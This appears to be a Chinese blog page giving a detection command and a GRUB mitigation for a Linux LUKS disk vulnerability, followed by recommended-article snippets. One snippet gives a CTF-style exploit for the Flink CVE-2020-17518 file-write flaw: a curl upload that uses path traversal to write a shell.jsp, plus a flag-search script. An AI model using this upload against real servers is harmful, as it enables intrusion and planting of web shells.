Linux 磁盘高危漏洞 - 1

最新推荐文章于 2025-04-24 07:00:00 发布
原创 最新推荐文章于 2025-04-24 07:00:00 发布
· 790 阅读 · 0 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux

参考: http://www.cnbeta.com/articles/558923.htm

  • 检测命令
dmsetup status | awk 'BEGIN {FS=":"} ; /crypt\s*$/ {print "Encrypted: " $1}'

# 返回空代表正常
  • 修复
sed -i 's/GRUB_CMDLINE_LINUX_DEFAULT="/GRUB_CMDLINE_LINUX_DEFAULT="panic=5 /' /etc/default/grub grub-install

这里写图片描述

有兴趣可以参考下
http://nolinux.blog.51cto.com/4824967/1436460
进行测试。

不过笔者进行了简单的创建、挂载测试,没有复现。

[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 9140
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
杨秀璋的专栏
02-27 1万+
作者前文介绍了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助,漫漫长征路,偏向虎山行。享受过程,一起加油~
按键70秒,Root轻松得:Linux惊现高危漏洞
snow2know的博客
12-09 848
导读 E安全1116日讯 Linux被发现高危漏洞(CVE-2016-4484),攻击者可以通过持续按下Enter键70秒钟来获取 root initramfs shell,进而破坏Linux boxes。漏洞存在于Linux流行变体中的统一密钥设置(LUKS)。通过访问shell,攻击者可以解密Linux机器。该攻击也适用于云端的虚拟Linux boxes。 该漏洞影响Ubuntu,Fedo
Linux内核高危提权漏洞,这些版本快升级
Chinese_big_boy的博客
08-26 368
据介绍,本地用户可以将自己的数据注入敏感的只读文件,消除限制或修改配置以获得更高的权限。有研究人员通过利用该漏洞修改 /etc/passwd 文件进行了举例,修改后可直接取消 root 用户的密码,然后普通用户使用 su root 命令即可获得 root 账户的访问权限。Max 表示,“脏管道”漏洞与几年前的“脏牛”类似,所以采用了相似的名字,不过前者更容易被利用。因为非特权进程可以将代码注入 root 进程。最后,建议各位检查所使用的 Linux 服务器的内核版本,若是 5.8 以上的版本请尽快升级。..
Linux系统之dmsetup详解
最新发布
weixin_56303229的博客
04-24 326
dmsetup 是一个用于管理基于设备映射器(device-mapper)驱动的逻辑设备的低级工具。设备映射器是 Linux 内核中用于创建虚拟块设备的核心组件,广泛应用于逻辑卷管理(LVM)、加密设备(如 dm-crypt)和 RAID 等场景。通过 dmsetup,用户可以创建、删除、修改、挂起和恢复设备映射器设备,并查看其状态和相关信息。每个逻辑设备由一个表(table)定义,该表为逻辑设备的每个扇区(512 字节)指定一个目标(target)。
dmsetup命令
qq_42533216的博客
06-23 4333
A.2. DMSETUP 命令 命令是一个用来与 Device Mapper 沟通的命令行封装器(wrapper)。可使用 命令的 、、 和 选项查看 LVM 设备的常规信息,如以下小节所述。有关 命令的额外选项和功能,请参考 (8) man page。 命令提供有关 Device Mapper 设备概述。如果没有指定设备名称,则输出所有目前配置的 Device Mapper 设备信息。如果指定了设备,那么这个命令只会生成该设备信息。 命令提供以下分类信息:设备名称。LVM 设备以用小横线分隔的卷
device mapper的使用
热门推荐
RichardYSteven的专栏
09-03 1万+
http://www.ibm.com/developerworks/cn/linux/l-devmapper/index.html 这个页面讲了点原理,可以看一下。 dmsetup命令 显示当前的device mapper的信息 dmsetup ls dmsetup info dmsetup status 显示设备的依赖关系 dmsetup deps sda
linux dmsetup用法,linux 命令 -- dmsetup
weixin_31347649的博客
05-13 4076
demsetup 个人理解dmsetup 是low level logical volume management。我理解的意思是,这是一个更加底层的逻辑卷管理工具。平时我们管理linux 上的逻辑卷,使用lvm相关的工具即可。lvs是更高级的管理逻辑卷的命令,但是,有时候会出现类似lvm 删除不掉的lvm分区。我们可以使用dmsetup 去删除。demsetup 命令语法dmsetup info...
Linux近两年高危漏洞修复过程记录_cve-2023-27535
2401_84141337的博客
04-08 1058
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
VMware紧急告警:VMSA-2025-0004修复ESXi、Workstation 和 Fusion 等多个在野使用漏洞
我在Citrix、VMware、Veeam、微软和NVIDIA等领域拥有丰富经验的专业人士,专注于设计和维护虚拟化基础设施、实施备份与灾难恢复策略,致力于优化企业的IT环境。
03-15 1117
VMware紧急告警:VMSA-2025-0004修复ESXi、Workstation 和 Fusion 等多个在野使用漏洞
使用 OWASP Dependency-Check 扫描 Spring Framework 漏洞
洛秋的博客
12-27 505
这个配置专门针对 Spring Framework 的 CVE-2024-22243 漏洞检测进行了优化,同时也会扫描其他潜在的安全问题。
格式化磁盘
aolitianya的博客
03-20 159
linux上格式化一个曾经的系统磁盘
dmsetup--device mapper 管理工具(误删除逻辑卷lvm设备文件处理方法)
gary.guo
03-16 5563
dmsetup 命令 一、介绍 Mapped Device 是一个逻辑抽象,可以理解成为内核向外提供的逻辑设备,它通过Mapping Table描述的映射关系和Target Device建立映射。Target device表示的是Mapped Device所映射的物理空间段,对Mapped Device所表示逻辑设备来收,就是该逻辑设备映射到的一个物理设备。 Mapping Table里有 Mapped Device 逻辑的起始地址、范围、和表示在 Target Device 所在物理设备的地址偏移量以
Linux Command dmsetup管理LVM
爱死亡机器人
04-16 6455
介绍 dmsetup 命令是一个用来与 Device Mapper 沟通的命令行封装器(wrapper)。可使用 dmsetup 命令的 info、ls、status 和 deps 选项查看 LVM 设备的常规信息,如以下小节所述。 语法 dmsetup + <command> + <device_name> or <uuid> # command 常见的有 remove 、 ls 、status 等 # device_name: 可以是/dev/sd*,或者是物理卷
无法创建文件系统以及无法创建PV时怎么办?
weixin_34146410的博客
07-23 895
我们平常对磁盘分区格式化的时候有时无法格式化,报告的信息为:“/dev/sdb3isapparentlyinusebythesystem;willnotmakeafilesystemhere!”意思是说:似乎系统正在使用该设备,无法创建文件系统。使用【mount】查看系统的所有挂载设备,也没有:/dev/sdb3.但是,创建文件系统的时候。就...
dmsetup命令使用
wu_wu2009的专栏
08-26 7427
[root@bdwg mapper]# dmsetup ls VolGroup01-lvol_bdwg04  (253, 11) VolGroup01-lvol_bdwg03  (253, 10) VolGroup01-lvol_bdwg02  (253, 9) VolGroup01-lvol_bdwg01  (253, 8) VolGroup01-lvol_systemproc    
dmsetup 手册
baicaiCCL的博客
05-01 3119
dmsetup SYNOPSIS dmsetup clear device_name dmsetup create device_name [-u|–uuid uuid] [–addnodeoncreate|–addnodeonresume] [-n|–notable|–table table|table_file] [–readahead [+]sectors|auto|none] dmsetu...
【openeuler 21.3】格式化磁盘提示被系统占用
lucky_fd的博客
12-23 6053
#格式化磁盘提示被系统占用 [root@localhost /]# mkfs -t ext4 /dev/sda3 mke2fs 1.45.6 (20-Mar-2020) /dev/sda3 有一个 LVM2_member 文件系统 Proceed anyway? (y,N) y /dev/sda3 显然正被系统使用; 取消建立 文件系统 ! sdc的信息如下,sdc被当做系统挂盘用过,所以sdc里有swap分区 原因/dev/sdc里的交换分区正在被DM管理,可以手动移除 使用dmsetup s
flink 文件写入 (CVE-2020-17518)获取flag
04-01
### Flink CVE-2020-17518 文件写入漏洞 Flag 获取方式 #### 背景介绍 CVE-2020-17518 是 Apache Flink 的一个高危漏洞,允许攻击者通过修改 HTTP 头部字段来实现任意文件写入。此漏洞影响版本范围为 Apache Flink 1.5.11.11.2[^3]。 当利用该漏洞时,通常目标是向服务器植入恶意脚本或配置文件以完成进一步渗透测试任务。Flag 获取通常是 CTF 或安全演练中的一个重要环节,其核心在于如何成功执行命令或将特定数据写入指定路径下的文件中。 --- #### 利用过程概述 为了获取 Flag,可以通过以下方式进行: 1. **构建恶意请求** 攻击者需要构造一个带有自定义 `Location` 参数的 POST 请求,用于覆盖默认的目标存储路径。具体来说,`Location` 字段决定了上传文件保存的位置。如果设置成 `/etc/passwd` 或其他敏感文件,则可能引发服务异常;但如果指向临时目录或者 Web 可访问区域,则可用来放置反序列化载荷或其他工具脚本。 下面是一个典型的 curl 命令示例: ```bash curl -X POST http://<target>:8081/jars/upload \ --header 'Content-Disposition: form-data; name="file"; filename="/../../../../../../tmp/shell.jsp"' \ --form file=@"/path/to/malicious_file" ``` 此处需要注意的是,`filename` 属性被篡改为包含多个 `../` 来突破正常沙盒限制,并最终定位至期望的目的地文件夹下[^5]。 2. **验证写入结果** 成功发送上述 payload 后,应立即检查对应位置是否存在预期生成的新文件。例如,在 Linux 平台上尝试读取刚才创建的内容确认是否生效: ```bash cat /tmp/shell.jsp ``` 如果一切顺利的话,应该能看到我们之前提交上去的数据片段。 3. **提取 Flag 数据** 接下来就是寻找实际比赛场景里预埋好的标记字符串了——这一步取决于主办方设计的具体规则以及隐藏形式。一般情况下会嵌套于某些特殊命名模式的日志记录、数据库表项甚至是图片元信息之中。因此建议采用正则表达式扫描整个磁盘分区查找匹配关键字的方式快速锁定答案所在之处: ```python import os def find_flag(directory, keyword): for root, dirs, files in os.walk(directory): for fname in files: fpath = os.path.join(root, fname) try: with open(fpath, errors='ignore') as fp: content = fp.read() if keyword in content: print(f"[+] Found flag at {fpath}") except Exception as e: pass # Example usage find_flag('/mnt', 'flag{') ``` 使用 Python 编写的这段简单函数可以帮助自动化这一繁琐流程,只需调整搜索起点与标志词即可适应不同题目需求[^4]。 --- ### 注意事项 尽管演示过程中展示了多种技术手段辅助解决问题,但在真实世界环境中实施此类行为均属非法入侵范畴,请务必严格遵守法律法规仅限授权范围内开展相关活动! ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值